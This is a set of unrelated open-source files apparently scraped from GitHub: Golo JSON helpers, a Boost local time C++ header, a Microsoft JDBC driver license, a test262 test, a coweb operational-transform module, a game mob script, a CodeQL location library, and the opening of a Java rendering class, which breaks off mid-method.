function toDynamicObjectFromMap = |mapInstance| -> toDynamicObjectFromJSONObject(parse(stringify(mapInstance)))
----
Returns a list of dynamic objects from a collection of maps where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let objects = JSON.toDynamicObjectsListFromMapsCollection([
map[["message", "hello"]],
map[
["id", "bob"],
["friends", list[
map[["name", "sam"]],
map[["name", "jane"]],
map[["name", "john"]]
]],
["address", map[
["street", "20 Avenue Albert Einstein"],
["city", "Villeurbanne"],
["zip", "69100"],
["country", "France"]
]]
]
])
println(objects: get(1): friends(): get(2): name(): equals("john")) # true
println(objects: get(1): address(): city(): equals("Villeurbanne")) # true
----
function toDynamicObjectsListFromMapsCollection = |mapInstance| -> toDynamicObjectsListFromJSONArray(parse(stringify(mapInstance)))
# ............................................................................................... #
----
JSON augmentations for structs.
----
augment gololang.GoloStruct {
----
Conveniently adds a `toJSON()` method, which is equivalent to calling `JSON.stringify()`:
struct Person = { name, age, email }
# (...)
Person("Mr Bean", "[email protected]", 64): toJSON()
----
function toJSON = |this| -> stringify(this)
----
Populates the elements of a struct based on the values found in a JSON string.
let str = JSON.stringify(map[
["name", "Foo"],
["email", "[email protected]"],
["age", 99],
["gender", "N/A"]
])
let foo = Person(): updateFromJSON(str)
Note that missing entries from the JSON data yield `null` values in the struct.
----
function updateFromJSON = |this, str| {
let map = parse(str)
foreach member in this: members() {
this: set(member, map: get(member))
}
return this
}
}
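# Illustrative sketch (not from the original module): the two augmentations above
# compose into a simple round trip, assuming a `Person` struct as in the examples:
#
#   let copy = Person(): updateFromJSON(Person("Mr Bean", 64, "[email protected]"): toJSON())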
# ............................................................................................... #
| {
"pile_set_name": "Github"
} |
#ifndef LOCAL_TIME_LOCAL_DATE_TIME_HPP__
#define LOCAL_TIME_LOCAL_DATE_TIME_HPP__
/* Copyright (c) 2003-2005 CrystalClear Software, Inc.
* Subject to the Boost Software License, Version 1.0.
* (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
* Author: Jeff Garland, Bart Garst
* $Date$
*/
#include <string>
#include <iomanip>
#include <sstream>
#include <stdexcept>
#include <boost/shared_ptr.hpp>
#include <boost/throw_exception.hpp>
#include <boost/date_time/time.hpp>
#include <boost/date_time/posix_time/posix_time.hpp> //todo remove?
#include <boost/date_time/compiler_config.hpp>
#include <boost/date_time/dst_rules.hpp>
#include <boost/date_time/time_zone_base.hpp>
#include <boost/date_time/special_defs.hpp>
#include <boost/date_time/time_resolution_traits.hpp> // absolute_value
namespace boost {
namespace local_time {
//! simple exception for reporting when STD or DST cannot be determined
struct BOOST_SYMBOL_VISIBLE ambiguous_result : public std::logic_error
{
ambiguous_result (std::string const& msg = std::string()) :
std::logic_error(std::string("Daylight Savings Results are ambiguous: " + msg)) {}
};
//! simple exception for when time label given cannot exist
struct BOOST_SYMBOL_VISIBLE time_label_invalid : public std::logic_error
{
time_label_invalid (std::string const& msg = std::string()) :
std::logic_error(std::string("Time label given is invalid: " + msg)) {}
};
struct BOOST_SYMBOL_VISIBLE dst_not_valid: public std::logic_error
{
dst_not_valid(std::string const& msg = std::string()) :
std::logic_error(std::string("is_dst flag does not match resulting dst for time label given: " + msg)) {}
};
//TODO: I think these should be in local_date_time_base and not
// necessarily brought into the namespace
using date_time::time_is_dst_result;
using date_time::is_in_dst;
using date_time::is_not_in_dst;
using date_time::ambiguous;
using date_time::invalid_time_label;
//! Representation of "wall-clock" time in a particular time zone
/*! Representation of "wall-clock" time in a particular time zone
* Local_date_time_base holds a time value (date and time offset from 00:00)
* along with a time zone. The time value is stored as UTC and conversions
* to wall clock time are made as needed. This approach allows for
* operations between wall-clock times in different time zones, and
* daylight savings time considerations, to be made. Time zones are
* required to be in the form of a boost::shared_ptr<time_zone_base>.
*/
template<class utc_time_=posix_time::ptime,
class tz_type=date_time::time_zone_base<utc_time_,char> >
class BOOST_SYMBOL_VISIBLE local_date_time_base : public date_time::base_time<utc_time_,
boost::posix_time::posix_time_system> {
public:
typedef utc_time_ utc_time_type;
typedef typename utc_time_type::time_duration_type time_duration_type;
typedef typename utc_time_type::date_type date_type;
typedef typename date_type::duration_type date_duration_type;
typedef typename utc_time_type::time_system_type time_system_type;
/*! This constructor interprets the passed time as a UTC time.
* So, for example, if the passed timezone is UTC-5 then the
* time will be adjusted back 5 hours. The time zone allows for
* automatic calculation of whether the particular time is adjusted for
* daylight savings, etc.
* If the time zone shared pointer is null then time stays unadjusted.
*@param t A UTC time
*@param tz Time zone to adjust the UTC time to.
*/
local_date_time_base(utc_time_type t,
boost::shared_ptr<tz_type> tz) :
date_time::base_time<utc_time_type, time_system_type>(t),
zone_(tz)
{
// param was already utc so nothing more to do
}
/*! This constructs a local time -- the passed time information is
* understood to be in the passed tz. The DST flag must be passed
* to indicate whether the time is in daylight savings or not.
* @throws -- time_label_invalid if the time passed does not exist in
* the given time zone. The non-existent case typically occurs during
* the shift forward to daylight savings time: when the clock is
* shifted forward, a range of times (2 am to 3 am in the US) is
* skipped and hence is invalid.
* @throws -- dst_not_valid if the DST flag is passed for a period
* where DST is not active.
*/
local_date_time_base(date_type d,
time_duration_type td,
boost::shared_ptr<tz_type> tz,
bool dst_flag) : //necessary for constr_adj()
date_time::base_time<utc_time_type,time_system_type>(construction_adjustment(utc_time_type(d, td), tz, dst_flag)),
zone_(tz)
{
if(tz != boost::shared_ptr<tz_type>() && tz->has_dst()){
// d & td are already local so we use them
time_is_dst_result result = check_dst(d, td, tz);
bool in_dst = (result == is_in_dst); // less processing than is_dst()
// ambig occurs at end, invalid at start
if(result == invalid_time_label){
// Ex: 2:15am local on trans-in day in nyc, dst_flag irrelevant
std::ostringstream ss;
ss << "time given: " << d << ' ' << td;
boost::throw_exception(time_label_invalid(ss.str()));
}
else if(result != ambiguous && in_dst != dst_flag){
// is dst_flag accurate?
// Ex: false flag in NYC in June
std::ostringstream ss;
ss.setf(std::ios_base::boolalpha);
ss << "flag given: dst=" << dst_flag << ", dst calculated: dst=" << in_dst;
boost::throw_exception(dst_not_valid(ss.str()));
}
// everything checks out and conversion to utc already done
}
}
//TODO maybe not the right set...Ignore the last 2 for now...
enum DST_CALC_OPTIONS { EXCEPTION_ON_ERROR, NOT_DATE_TIME_ON_ERROR };
//ASSUME_DST_ON_ERROR, ASSUME_NOT_DST_ON_ERROR };
/*! This constructs a local time -- the passed time information is
* understood to be in the passed tz. The DST flag is calculated
* according to the specified rule.
*/
local_date_time_base(date_type d,
time_duration_type td,
boost::shared_ptr<tz_type> tz,
DST_CALC_OPTIONS calc_option) :
// dummy value - time_ is set in constructor code
date_time::base_time<utc_time_type,time_system_type>(utc_time_type(d,td)),
zone_(tz)
{
time_is_dst_result result = check_dst(d, td, tz);
if(result == ambiguous) {
if(calc_option == EXCEPTION_ON_ERROR){
std::ostringstream ss;
ss << "time given: " << d << ' ' << td;
boost::throw_exception(ambiguous_result(ss.str()));
}
else{ // NADT on error
this->time_ = posix_time::posix_time_system::get_time_rep(date_type(date_time::not_a_date_time), time_duration_type(date_time::not_a_date_time));
}
}
else if(result == invalid_time_label){
if(calc_option == EXCEPTION_ON_ERROR){
std::ostringstream ss;
ss << "time given: " << d << ' ' << td;
boost::throw_exception(time_label_invalid(ss.str()));
}
else{ // NADT on error
this->time_ = posix_time::posix_time_system::get_time_rep(date_type(date_time::not_a_date_time), time_duration_type(date_time::not_a_date_time));
}
}
else if(result == is_in_dst){
utc_time_type t =
construction_adjustment(utc_time_type(d, td), tz, true);
this->time_ = posix_time::posix_time_system::get_time_rep(t.date(),
t.time_of_day());
}
else{
utc_time_type t =
construction_adjustment(utc_time_type(d, td), tz, false);
this->time_ = posix_time::posix_time_system::get_time_rep(t.date(),
t.time_of_day());
}
}
//! Determines if given time label is in daylight savings for given zone
/*! Determines if given time label is in daylight savings for given zone.
* Takes a date and time_duration representing a local time, along
* with time zone, and returns a time_is_dst_result object as result.
*/
static time_is_dst_result check_dst(date_type d,
time_duration_type td,
boost::shared_ptr<tz_type> tz)
{
if(tz != boost::shared_ptr<tz_type>() && tz->has_dst()) {
typedef typename date_time::dst_calculator<date_type, time_duration_type> dst_calculator;
return dst_calculator::local_is_dst(
d, td,
tz->dst_local_start_time(d.year()).date(),
tz->dst_local_start_time(d.year()).time_of_day(),
tz->dst_local_end_time(d.year()).date(),
tz->dst_local_end_time(d.year()).time_of_day(),
tz->dst_offset()
);
}
else{
return is_not_in_dst;
}
}
//! Simple destructor, releases time zone if last referrer
~local_date_time_base() {}
//! Copy constructor
local_date_time_base(const local_date_time_base& rhs) :
date_time::base_time<utc_time_type, time_system_type>(rhs),
zone_(rhs.zone_)
{}
//! Special values constructor
explicit local_date_time_base(const boost::date_time::special_values sv,
boost::shared_ptr<tz_type> tz = boost::shared_ptr<tz_type>()) :
date_time::base_time<utc_time_type, time_system_type>(utc_time_type(sv)),
zone_(tz)
{}
//! returns time zone associated with calling instance
boost::shared_ptr<tz_type> zone() const
{
return zone_;
}
//! Returns false if time_zone is NULL or if the time value is a special_value
bool is_dst() const
{
if(zone_ != boost::shared_ptr<tz_type>() && zone_->has_dst() && !this->is_special()) {
// check_dst takes a local time, *this is utc
utc_time_type lt(this->time_);
lt += zone_->base_utc_offset();
// dst_offset only needs to be considered with ambiguous time labels
// make that adjustment there
switch(check_dst(lt.date(), lt.time_of_day(), zone_)){
case is_not_in_dst:
return false;
case is_in_dst:
return true;
case ambiguous:
if(lt + zone_->dst_offset() < zone_->dst_local_end_time(lt.date().year())) {
return true;
}
break;
case invalid_time_label:
if(lt >= zone_->dst_local_start_time(lt.date().year())) {
return true;
}
break;
}
}
return false;
}
//! Returns object's time value as a utc representation
utc_time_type utc_time() const
{
return utc_time_type(this->time_);
}
//! Returns object's time value as a local representation
utc_time_type local_time() const
{
if(zone_ != boost::shared_ptr<tz_type>()){
utc_time_type lt = this->utc_time() + zone_->base_utc_offset();
if (is_dst()) {
lt += zone_->dst_offset();
}
return lt;
}
return utc_time_type(this->time_);
}
//! Returns string in the form "2003-Aug-20 05:00:00 EDT"
/*! Returns string in the form "2003-Aug-20 05:00:00 EDT". If
* time_zone is NULL the time zone abbreviation will be "UTC". The time
* zone abbrev will not be included if calling object is a special_value*/
std::string to_string() const
{
//TODO is this a temporary function ???
std::ostringstream ss;
if(this->is_special()){
ss << utc_time();
return ss.str();
}
if(zone_ == boost::shared_ptr<tz_type>()) {
ss << utc_time() << " UTC";
return ss.str();
}
bool is_dst_ = is_dst();
utc_time_type lt = this->utc_time() + zone_->base_utc_offset();
if (is_dst_) {
lt += zone_->dst_offset();
}
ss << local_time() << " ";
if (is_dst()) {
ss << zone_->dst_zone_abbrev();
}
else {
ss << zone_->std_zone_abbrev();
}
return ss.str();
}
/*! returns a local_date_time_base in the given time zone with the
* optional time_duration added. */
local_date_time_base local_time_in(boost::shared_ptr<tz_type> new_tz,
time_duration_type td=time_duration_type(0,0,0)) const
{
return local_date_time_base(utc_time_type(this->time_) + td, new_tz);
}
//! Returns name of associated time zone or "Coordinated Universal Time".
/*! Optional bool parameter will return time zone as an offset
* (ie "+07:00" extended iso format). Empty string is returned for
* classes that do not use a time_zone */
std::string zone_name(bool as_offset=false) const
{
if(zone_ == boost::shared_ptr<tz_type>()) {
if(as_offset) {
return std::string("Z");
}
else {
return std::string("Coordinated Universal Time");
}
}
if (is_dst()) {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
td += zone_->dst_offset();
return zone_as_offset(td, ":");
}
else {
return zone_->dst_zone_name();
}
}
else {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
return zone_as_offset(td, ":");
}
else {
return zone_->std_zone_name();
}
}
}
//! Returns abbreviation of associated time zone or "UTC".
/*! Optional bool parameter will return time zone as an offset
* (ie "+0700" iso format). Empty string is returned for classes
* that do not use a time_zone */
std::string zone_abbrev(bool as_offset=false) const
{
if(zone_ == boost::shared_ptr<tz_type>()) {
if(as_offset) {
return std::string("Z");
}
else {
return std::string("UTC");
}
}
if (is_dst()) {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
td += zone_->dst_offset();
return zone_as_offset(td, "");
}
else {
return zone_->dst_zone_abbrev();
}
}
else {
if(as_offset) {
time_duration_type td = zone_->base_utc_offset();
return zone_as_offset(td, "");
}
else {
return zone_->std_zone_abbrev();
}
}
}
//! returns a posix_time_zone string for the associated time_zone. If no time_zone, "UTC+00" is returned.
std::string zone_as_posix_string() const
{
if(zone_ == shared_ptr<tz_type>()) {
return std::string("UTC+00");
}
return zone_->to_posix_string();
}
//! Equality comparison operator
/*bool operator==(const date_time::base_time<boost::posix_time::ptime,boost::posix_time::posix_time_system>& rhs) const
{ // fails due to rhs.time_ being protected
return date_time::base_time<boost::posix_time::ptime,boost::posix_time::posix_time_system>::operator==(rhs);
//return this->time_ == rhs.time_;
}*/
//! Equality comparison operator
bool operator==(const local_date_time_base& rhs) const
{
return time_system_type::is_equal(this->time_, rhs.time_);
}
//! Non-Equality comparison operator
bool operator!=(const local_date_time_base& rhs) const
{
return !(*this == rhs);
}
//! Less than comparison operator
bool operator<(const local_date_time_base& rhs) const
{
return time_system_type::is_less(this->time_, rhs.time_);
}
//! Less than or equal to comparison operator
bool operator<=(const local_date_time_base& rhs) const
{
return (*this < rhs || *this == rhs);
}
//! Greater than comparison operator
bool operator>(const local_date_time_base& rhs) const
{
return !(*this <= rhs);
}
//! Greater than or equal to comparison operator
bool operator>=(const local_date_time_base& rhs) const
{
return (*this > rhs || *this == rhs);
}
//! Local_date_time + date_duration
local_date_time_base operator+(const date_duration_type& dd) const
{
return local_date_time_base(time_system_type::add_days(this->time_,dd), zone_);
}
//! Local_date_time += date_duration
local_date_time_base operator+=(const date_duration_type& dd)
{
this->time_ = time_system_type::add_days(this->time_,dd);
return *this;
}
//! Local_date_time - date_duration
local_date_time_base operator-(const date_duration_type& dd) const
{
return local_date_time_base(time_system_type::subtract_days(this->time_,dd), zone_);
}
//! Local_date_time -= date_duration
local_date_time_base operator-=(const date_duration_type& dd)
{
this->time_ = time_system_type::subtract_days(this->time_,dd);
return *this;
}
//! Local_date_time + time_duration
local_date_time_base operator+(const time_duration_type& td) const
{
return local_date_time_base(time_system_type::add_time_duration(this->time_,td), zone_);
}
//! Local_date_time += time_duration
local_date_time_base operator+=(const time_duration_type& td)
{
this->time_ = time_system_type::add_time_duration(this->time_,td);
return *this;
}
//! Local_date_time - time_duration
local_date_time_base operator-(const time_duration_type& td) const
{
return local_date_time_base(time_system_type::subtract_time_duration(this->time_,td), zone_);
}
//! Local_date_time -= time_duration
local_date_time_base operator-=(const time_duration_type& td)
{
this->time_ = time_system_type::subtract_time_duration(this->time_,td);
return *this;
}
//! local_date_time - local_date_time --> time_duration_type
time_duration_type operator-(const local_date_time_base& rhs) const
{
return utc_time_type(this->time_) - utc_time_type(rhs.time_);
}
private:
boost::shared_ptr<tz_type> zone_;
//bool is_dst_;
/*! Adjust the passed-in local time to UTC by removing the DST offset
* (when applicable) and the base UTC offset.
*/
utc_time_type construction_adjustment(utc_time_type t,
boost::shared_ptr<tz_type> z,
bool dst_flag)
{
if(z != boost::shared_ptr<tz_type>()) {
if(dst_flag && z->has_dst()) {
t -= z->dst_offset();
} // else no adjust
t -= z->base_utc_offset();
}
return t;
}
/*! Simple formatting code -- todo remove this?
*/
std::string zone_as_offset(const time_duration_type& td,
const std::string& separator) const
{
std::ostringstream ss;
if(td.is_negative()) {
// a negative duration is represented as "-[h]h:mm"
// we require two digits for the hour. A positive duration
// with the %H flag will always give two digits
ss << "-";
}
else {
ss << "+";
}
ss << std::setw(2) << std::setfill('0')
<< date_time::absolute_value(td.hours())
<< separator
<< std::setw(2) << std::setfill('0')
<< date_time::absolute_value(td.minutes());
return ss.str();
}
};
//!Use the default parameters to define local_date_time
typedef local_date_time_base<> local_date_time;
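/* Illustrative usage sketch (not part of the original header). The POSIX time
 * zone string below is an assumed example; any boost::local_time::time_zone_ptr
 * built elsewhere (e.g. from a tz database file) can be passed in the same way.
 *
 *   boost::local_time::time_zone_ptr nyc(
 *       new boost::local_time::posix_time_zone("EST-5EDT,M4.1.0,M10.5.0"));
 *   boost::posix_time::ptime utc = boost::posix_time::second_clock::universal_time();
 *   boost::local_time::local_date_time now(utc, nyc); // stored internally as UTC
 *   std::string s = now.to_string();                  // e.g. "2003-Aug-20 05:00:00 EDT"
 *   bool dst = now.is_dst();                          // resolved from the zone's DST rules
 */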
} }
#endif
| {
"pile_set_name": "Github"
} |
MICROSOFT SOFTWARE LICENSE TERMS
MICROSOFT SQL SERVER 2005 JDBC DRIVER
January 2006
These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft
· updates,
· supplements,
· Internet-based services, and
· support services
for this software, unless other terms accompany those items. If so, those terms apply.
By using the software, you accept these terms. If you do not accept them, do not use the software.
If you comply with these license terms, you have the rights below.
1. INSTALLATION AND USE RIGHTS. You may install and use any number of copies of the software on your devices.
2. SCOPE OF LICENSE. The software is licensed, not sold. This agreement only gives you some rights to use the software. Microsoft reserves all other rights. Unless applicable law gives you more rights despite this limitation, you may use the software only as expressly permitted in this agreement. In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways. You may not
· disclose the results of any benchmark tests of the software to any third party without Microsoft’s prior written approval;
· reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permits, despite this limitation;
· publish the software for others to copy; or
· rent, lease or lend the software.
3. TRANSFER TO A THIRD PARTY. The first user of the software may transfer it and this agreement directly to a third party. Before the transfer, that party must agree that this agreement applies to the transfer and use of the software. The first user must uninstall the software before transferring it separately from the device. The first user may not retain any copies.
4. EXPORT RESTRICTIONS. The software is subject to United States export laws and regulations. You must comply with all domestic and international export laws and regulations that apply to the software. These laws include restrictions on destinations, end users and end use. For additional information, see www.microsoft.com/exporting.
5. SUPPORT SERVICES. Because this software is “as is,” we may not provide support services for it.
6. ENTIRE AGREEMENT. This agreement, and the terms for supplements, updates, Internet-based services and support services that you use, are the entire agreement for the software and support services.
7. APPLICABLE LAW.
a. United States. If you acquired the software in the United States, Washington state law governs the interpretation of this agreement and applies to claims for breach of it, regardless of conflict of laws principles. The laws of the state where you live govern all other claims, including claims under state consumer protection laws, unfair competition laws, and in tort.
b. Outside the United States. If you acquired the software in any other country, the laws of that country apply.
8. LEGAL EFFECT. This agreement describes certain legal rights. You may have other rights under the laws of your country. You may also have rights with respect to the party from whom you acquired the software. This agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so.
9. DISCLAIMER OF WARRANTY. The software is licensed “as-is.” You bear the risk of using it. Microsoft gives no express warranties, guarantees or conditions. You may have additional consumer rights under your local laws which this agreement cannot change. To the extent permitted under your local laws, Microsoft excludes the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
10. LIMITATION ON AND EXCLUSION OF REMEDIES AND DAMAGES. You can recover from Microsoft and its suppliers only direct damages up to U.S. $5.00. You cannot recover any other damages, including consequential, lost profits, special, indirect or incidental damages.
This limitation applies to
· anything related to the software, services, content (including code) on third party Internet sites, or third party programs; and
· claims for breach of contract, breach of warranty, guarantee or condition, strict liability, negligence, or other tort to the extent permitted by applicable law.
It also applies even if Microsoft knew or should have known about the possibility of the damages. The above limitation or exclusion may not apply to you because your country may not allow the exclusion or limitation of incidental, consequential or other damages.
Please note: As this software is distributed in Quebec, Canada, some of the clauses in this agreement are provided below in French.
Remarque: Ce logiciel étant distribué au Québec, Canada, certaines des clauses dans ce contrat sont fournies ci-dessous en français.
EXONÉRATION DE GARANTIE. Le logiciel visé par une licence est offert « tel quel ». Toute utilisation de ce logiciel est à votre seule risque et péril. Microsoft n’accorde aucune autre garantie expresse. Vous pouvez bénéficier de droits additionnels en vertu du droit local sur la protection dues consommateurs, que ce contrat ne peut modifier. La ou elles sont permises par le droit locale, les garanties implicites de qualité marchande, d’adéquation à un usage particulier et d’absence de contrefaçon sont exclues.
LIMITATION DES DOMMAGES-INTÉRÊTS ET EXCLUSION DE RESPONSABILITÉ POUR LES DOMMAGES. Vous pouvez obtenir de Microsoft et de ses fournisseurs une indemnisation en cas de dommages directs uniquement à hauteur de 5,00 $ US. Vous ne pouvez prétendre à aucune indemnisation pour les autres dommages, y compris les dommages spéciaux, indirects ou accessoires et pertes de bénéfices.
Cette limitation concerne:
· tout ce qui est relié au logiciel, aux services ou au contenu (y compris le code) figurant sur des sites Internet tiers ou dans des programmes tiers ; et
· les réclamations au titre de violation de contrat ou de garantie, ou au titre de responsabilité stricte, de négligence ou d’une autre faute dans la limite autorisée par la loi en vigueur.
Elle s’applique également, même si Microsoft connaissait ou devrait connaître l’éventualité d’un tel dommage. Si votre pays n’autorise pas l’exclusion ou la limitation de responsabilité pour les dommages indirects, accessoires ou de quelque nature que ce soit, il se peut que la limitation ou l’exclusion ci-dessus ne s’appliquera pas à votre égard.
EFFET JURIDIQUE. Le présent contrat décrit certains droits juridiques. Vous pourriez avoir d’autres droits prévus par les lois de votre pays. Le présent contrat ne modifie pas les droits que vous confèrent les lois de votre pays si celles-ci ne le permettent pas.
| {
"pile_set_name": "Github"
} |
/// Copyright (c) 2012 Ecma International. All rights reserved.
/// Ecma International makes this code available under the terms and conditions set
/// forth on http://hg.ecmascript.org/tests/test262/raw-file/tip/LICENSE (the
/// "Use Terms"). Any redistribution of this code must retain the above
/// copyright and this notice and otherwise comply with the Use Terms.
/**
* @path ch15/15.4/15.4.4/15.4.4.19/15.4.4.19-3-4.js
* @description Array.prototype.map - value of 'length' is a number (value is +0)
*/
function testcase() {
function callbackfn(val, idx, obj) {
return val > 10;
}
var obj = { 0: 11, length: +0 };
var newArr = Array.prototype.map.call(obj, callbackfn);
return newArr.length === 0;
}
runTestCase(testcase);
| {
"pile_set_name": "Github"
} |
//
// Represents an update operation that replaces the value of one property
// with another.
//
// Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
// Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
//
/*jslint white:false, bitwise:true, eqeqeq:true, immed:true, nomen:false,
onevar:false, plusplus:false, undef:true, browser:true, devel:true,
forin:false, sub:false*/
/*global define*/
define([
'coweb/jsoe/Operation',
'coweb/jsoe/factory'
], function(Operation, factory) {
/**
* @constructor
*/
var UpdateOperation = function(args) {
this.type = 'update';
Operation.call(this, args);
};
UpdateOperation.prototype = new Operation();
UpdateOperation.prototype.constructor = UpdateOperation;
factory.registerOperationForType('update', UpdateOperation);
/**
* Gets the method name to use to transform another operation against this
* update operation.
*
* @return {String} Method name
*/
UpdateOperation.prototype.transformMethod = function() {
return 'transformWithUpdate';
};
/**
* Transforms this update to include the effect of an update.
*
* @param {UpdateOperation} op Update to include in this op
* @returns {UpdateOperation} This instance
*/
UpdateOperation.prototype.transformWithUpdate = function(op) {
if((op.position !== this.position) || (op.key !== this.key)) {
return this;
}
if(this.siteId > op.siteId) {
this.value = op.value;
} else if((this.siteId === op.siteId) && (this.seqId < op.seqId)) {
this.value = op.value;
}
return this;
};
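/* Illustrative sketch (literals are hypothetical; field names are those used by
 * the methods in this file): two sites concurrently update the same key at the
 * same position, and both replicas converge on the value from the lower site id.
 *
 *   // opA: {key: 'title', position: 0, value: 'A', siteId: 2, seqId: 7}
 *   // opB: {key: 'title', position: 0, value: 'B', siteId: 1, seqId: 7}
 *   // opA.transformWithUpdate(opB)  -> opA.value becomes 'B' (siteId 2 > 1)
 *   // opB.transformWithUpdate(opA)  -> opB.value stays 'B'
 */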
/**
* Transforms this update to include the effect of an insert.
*
* @param {InsertOperation} op Insert to include in this op
* @returns {UpdateOperation} This instance
*/
UpdateOperation.prototype.transformWithInsert = function(op) {
if(this.key !== op.key) {
return this;
}
if(this.position >= op.position) {
++this.position;
}
return this;
};
/**
* Transforms this update to include the effect of a delete.
*
* @param {DeleteOperation} op Delete to include in this op
* @returns {UpdateOperation} This instance
*/
UpdateOperation.prototype.transformWithDelete = function(op) {
if(this.key !== op.key) {
return this;
}
if(this.position > op.position) {
--this.position;
} else if(this.position === op.position) {
return null;
}
return this;
};
return UpdateOperation;
});
| {
"pile_set_name": "Github"
} |
/mob/living/simple_animal/hostile/retaliate
	var/list/enemies = list()

/mob/living/simple_animal/hostile/retaliate/ListTargets(var/dist = world.view)
	. = list()
	if(!enemies.len)
		return
	var/possible_targets = ..()
	for(var/weakref/W in enemies)
		var/mob/M = W.resolve()
		if(M in possible_targets)
			. += M

/mob/living/simple_animal/hostile/retaliate/proc/AddEnemies(var/list/possible_enemies)
	for(var/mob/M in possible_enemies)
		if(ValidTarget(M))
			enemies |= weakref(M)

/mob/living/simple_animal/hostile/retaliate/proc/FindAllies(var/list/possible_allies)
	for(var/mob/living/simple_animal/hostile/retaliate/H in possible_allies)
		if(!attack_same && !H.attack_same && H.faction == faction)
			H.enemies |= enemies

/mob/living/simple_animal/hostile/retaliate/proc/Retaliate(var/dist = world.view)
	var/list/possible_targets_or_allies = hearers(usr, dist)
	AddEnemies(possible_targets_or_allies)
	FindAllies(possible_targets_or_allies)

/mob/living/simple_animal/hostile/retaliate/adjustBruteLoss(var/damage)
	..(damage)
	Retaliate(10)
| {
"pile_set_name": "Github"
} |
license bsd2;
project "window"
{
depend "base";
depend "util";
depend "gui";
config "debug_dx9_win32";
config "optim_dx9_win32";
config "debug_dx11_win32";
config "optim_dx11_win32";
config "debug_gl2_win32";
config "optim_gl2_win32";
config "debug_gl2_linux";
config "optim_gl2_linux";
config "debug_gles2_ios";
config "optim_gles2_ios";
file "main.cpp";
file "main.hpp";
file "mp.txt";
}
| {
"pile_set_name": "Github"
} |
/** Provides classes for working with locations and program elements that have locations. */
import go
/**
* A location as given by a file, a start line, a start column,
* an end line, and an end column.
*
* For more information about locations see [LGTM locations](https://lgtm.com/help/ql/locations).
*/
class Location extends @location {
/** Gets the file for this location. */
File getFile() { locations_default(this, result, _, _, _, _) }
/** Gets the 1-based line number (inclusive) where this location starts. */
int getStartLine() { locations_default(this, _, result, _, _, _) }
/** Gets the 1-based column number (inclusive) where this location starts. */
int getStartColumn() { locations_default(this, _, _, result, _, _) }
/** Gets the 1-based line number (inclusive) where this location ends. */
int getEndLine() { locations_default(this, _, _, _, result, _) }
/** Gets the 1-based column number (inclusive) where this location ends. */
int getEndColumn() { locations_default(this, _, _, _, _, result) }
/** Gets the number of lines covered by this location. */
int getNumLines() { result = getEndLine() - getStartLine() + 1 }
/** Gets a textual representation of this element. */
string toString() {
exists(string filepath, int startline, int startcolumn, int endline, int endcolumn |
hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and
result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn
)
}
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
* column `endcolumn` of line `endline` in file `filepath`.
* For more information, see
* [LGTM locations](https://lgtm.com/help/ql/locations).
*/
predicate hasLocationInfo(
string filepath, int startline, int startcolumn, int endline, int endcolumn
) {
exists(File f |
locations_default(this, f, startline, startcolumn, endline, endcolumn) and
filepath = f.getAbsolutePath()
)
}
}
/** A program element with a location. */
class Locatable extends @locatable {
/** Gets the file this program element comes from. */
File getFile() { result = getLocation().getFile() }
/** Gets this element's location. */
Location getLocation() { has_location(this, result) }
/** Gets the number of lines covered by this element. */
int getNumLines() { result = getLocation().getNumLines() }
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
* column `endcolumn` of line `endline` in file `filepath`.
* For more information, see
* [LGTM locations](https://lgtm.com/help/ql/locations).
*/
predicate hasLocationInfo(
string filepath, int startline, int startcolumn, int endline, int endcolumn
) {
getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn)
}
/** Gets a textual representation of this element. */
string toString() { result = "locatable element" }
}
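/*
 * Illustrative sketch (not part of the original library): a minimal query built on
 * these classes, selecting every locatable element that starts on line 1 of its
 * file, together with that file's path.
 *
 *   import go
 *
 *   from Locatable e
 *   where e.getLocation().getStartLine() = 1
 *   select e, e.getFile().getAbsolutePath()
 */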
| {
"pile_set_name": "Github"
} |
/*
* To change this template, choose Tools | Templates and open the template in the editor.
*/
package view.acting;
import geometry.geom3d.Point3D;
import geometry.math.AngleUtil;
import java.awt.Color;
import java.util.logging.Logger;
import model.battlefield.abstractComps.FieldComp;
import model.battlefield.actors.Actor;
import model.battlefield.actors.ModelActor;
import model.battlefield.army.components.Projectile;
import model.battlefield.army.components.Turret;
import model.battlefield.army.components.Unit;
import model.battlefield.map.Trinket;
import view.mapDrawing.MapDrawer;
import view.material.MaterialManager;
import view.math.TranslateUtil;
import view.mesh.Circle;
import com.jme3.animation.AnimControl;
import com.jme3.animation.Bone;
import com.jme3.animation.Skeleton;
import com.jme3.math.Quaternion;
import com.jme3.math.Vector3f;
import com.jme3.renderer.queue.RenderQueue;
import com.jme3.scene.Geometry;
import com.jme3.scene.Node;
import com.jme3.scene.Spatial;
/**
* @author Benoît
*/
public class ModelPerformer extends Performer {
private static final Logger logger = Logger.getLogger(MapDrawer.class.getName());
public static final String ENTITYID_USERDATA = "entityid";
public ModelPerformer(ActorDrawer bs) {
super(bs);
}
@Override
public void perform(Actor a) {
ModelActor actor = (ModelActor) a;
if (actor.getViewElements().spatial == null) {
Spatial s = actorDrawer.buildSpatial(actor);
actor.getViewElements().spatial = s;
// We force an update here because we need immediate access to the bones' absolute positions.
AnimControl animControl = s.getControl(AnimControl.class);
if (animControl != null) {
animControl.update(0);
} else if(actor.getComp() instanceof Unit &&
!((Unit)actor.getComp()).getTurrets().isEmpty()) {
throw new RuntimeException("The unit "+actor.getComp()+" attached to actor "+actor+" have one or more turret, but no AnimControl.");
}
}
if (actor.getComp() != null) {
drawAsComp(actor);
}
}
protected void drawAsComp(ModelActor actor) {
Spatial s = actor.getViewElements().spatial;
